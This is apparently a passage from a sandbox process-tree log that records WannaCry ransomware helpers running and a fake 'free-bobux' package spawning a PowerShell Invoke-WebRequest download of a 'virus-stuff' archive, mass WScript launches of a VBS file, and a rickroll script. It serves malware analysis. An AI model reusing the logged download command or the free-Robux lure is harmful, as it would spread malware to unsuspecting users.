C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exetaskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]2⤵
- Executes dropped EXE
PID:4552
-
-
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]PID:4740
-
-
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exetaskdl.exe2⤵PID:4224
-
-
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exetaskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]2⤵PID:7720
-
-
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]PID:7728
-
-
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exetaskdl.exe2⤵PID:7808
-
-
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exetaskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]2⤵PID:10232
-
-
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]PID:9244
-
-
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exetaskdl.exe2⤵PID:9672
-
-
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exetaskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]2⤵PID:13204
-
-
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]PID:13212
-
-
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exetaskdl.exe2⤵PID:13268
-
-
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exetaskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]2⤵PID:8664
-
-
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]PID:9580
-
-
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exetaskdl.exe2⤵PID:11296
-
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2220
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1616
-
C:\Windows\system32\NOTEPAD.EXEPID:5524
-
C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux.exe"C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux.exe"1⤵PID:5848
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\5D8A.tmp\5D8B.tmp\5D8C.bat C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux.exe"2⤵PID:4804
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "Invoke-WebRequest https://github.com/astrohnugget/virus-stuff/archive/refs/heads/main.zip -outfile robux2.zip"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:364
-
-
-
C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux.exe"C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux.exe"1⤵PID:912
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\8381.tmp\8382.tmp\8383.bat C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux.exe"2⤵PID:2848
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "Invoke-WebRequest https://github.com/astrohnugget/virus-stuff/archive/refs/heads/main.zip -outfile robux2.zip"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:3596
-
-
C:\Windows\system32\timeout.exetimeout /t 10 /nobreak3⤵
- Delays execution with timeout.exe
PID:2164
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\free bobux.bat" "1⤵PID:1756
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "Invoke-WebRequest https://github.com/astrohnugget/virus-stuff/archive/refs/heads/main.zip -outfile robux2.zip"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1852
-
-
C:\Windows\system32\timeout.exetimeout /t 10 /nobreak2⤵
- Delays execution with timeout.exe
PID:5740
-
-
C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\melter.exe"C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\melter.exe"1⤵PID:5360
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\start.cmd" "1⤵
- Checks computer location settings
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
PID:4264 -
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"2⤵PID:4400
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"2⤵PID:5444
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"2⤵PID:2848
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"2⤵PID:1180
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"2⤵PID:1080
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"2⤵PID:4464
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"2⤵PID:336
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"2⤵PID:4560
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"2⤵PID:4664
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"2⤵PID:4892
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"2⤵PID:5308
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"2⤵PID:1968
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"2⤵PID:4252
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"2⤵PID:264
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"2⤵PID:5632
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"2⤵PID:1548
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"2⤵PID:2464
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"2⤵PID:904
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"2⤵PID:3820
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"2⤵PID:2624
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"2⤵PID:2436
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"2⤵PID:4916
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"2⤵PID:5936
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"2⤵PID:5740
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"2⤵PID:4516
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"2⤵PID:3444
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"2⤵PID:4868
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"2⤵PID:2184
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"2⤵PID:2504
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"2⤵PID:5836
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"2⤵PID:4960
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"2⤵PID:3464
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"2⤵PID:824
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"2⤵PID:5076
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"2⤵PID:3028
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"2⤵PID:3980
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"2⤵PID:5236
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"2⤵PID:4180
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"2⤵PID:1616
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"2⤵PID:5156
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"2⤵PID:4324
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"2⤵PID:2612
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"2⤵PID:524
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"2⤵PID:4564
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"2⤵PID:6044
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"2⤵PID:1504
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"2⤵PID:4580
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"2⤵PID:2076
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"2⤵PID:3332
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"2⤵PID:6024
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"2⤵PID:1420
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"2⤵PID:2344
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"2⤵PID:992
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"2⤵PID:5532
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"2⤵PID:5952
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"2⤵PID:2604
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"2⤵PID:712
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"2⤵PID:5264
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"2⤵PID:2200
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"2⤵PID:2704
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"2⤵PID:752
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"2⤵PID:3848
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"2⤵PID:3076
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"2⤵PID:5112
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"2⤵PID:4824
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"2⤵PID:2740
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"2⤵PID:2196
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"2⤵PID:4920
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"2⤵PID:4556
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"2⤵PID:3888
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"2⤵PID:6164
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"2⤵PID:6176
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"2⤵PID:6188
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"2⤵PID:6212
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"2⤵PID:6288
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"2⤵PID:6344
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"2⤵PID:6360
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"2⤵PID:6372
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"2⤵PID:6428
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"2⤵PID:6436
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"2⤵PID:6468
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"2⤵PID:6512
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"2⤵PID:6532
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"2⤵PID:6560
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"2⤵PID:6596
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"2⤵PID:6616
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"2⤵PID:6660
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"2⤵PID:6688
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"2⤵PID:6716
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"2⤵PID:6744
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"2⤵PID:6772
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"2⤵PID:6800
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"2⤵PID:6816
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"2⤵PID:6836
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"2⤵PID:6960
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"2⤵PID:6992
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"2⤵PID:7080
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"2⤵PID:7108
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"2⤵PID:7132
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"2⤵PID:6340
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"2⤵PID:7208
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"2⤵PID:7232
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"2⤵PID:7284
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"2⤵PID:7304
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"2⤵PID:7328
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"2⤵PID:7368
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"2⤵PID:7396
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"2⤵PID:7416
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"2⤵PID:7452
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"2⤵PID:7480
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"2⤵PID:7508
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"2⤵PID:7520
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"2⤵PID:7564
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"2⤵PID:7580
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"2⤵PID:7620
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"2⤵PID:7632
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"2⤵PID:7668
-
-
C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux.exe"C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux.exe"1⤵PID:8488
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\534B.tmp\534C.tmp\534D.bat C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux.exe"2⤵
- Checks computer location settings
- Modifies registry class
PID:8560 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "Invoke-WebRequest https://github.com/astrohnugget/virus-stuff/archive/refs/heads/main.zip -outfile robux2.zip"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:8584
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\rickroll.vbs"3⤵
- Checks computer location settings
PID:9092 -
C:\Windows\System32\SndVol.exe"C:\Windows\System32\SndVol.exe"4⤵PID:9168
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/watch?v=dQw4w9WgXcQ4⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
PID:6940 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.106 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7fffa802cc40,0x7fffa802cc4c,0x7fffa802cc585⤵PID:7752
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1852,i,11751579448551510369,17601482033703199078,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=1848 /prefetch:25⤵PID:6152
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2180,i,11751579448551510369,17601482033703199078,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=2192 /prefetch:35⤵PID:6272
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2244,i,11751579448551510369,17601482033703199078,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=2256 /prefetch:85⤵PID:6796
-
-
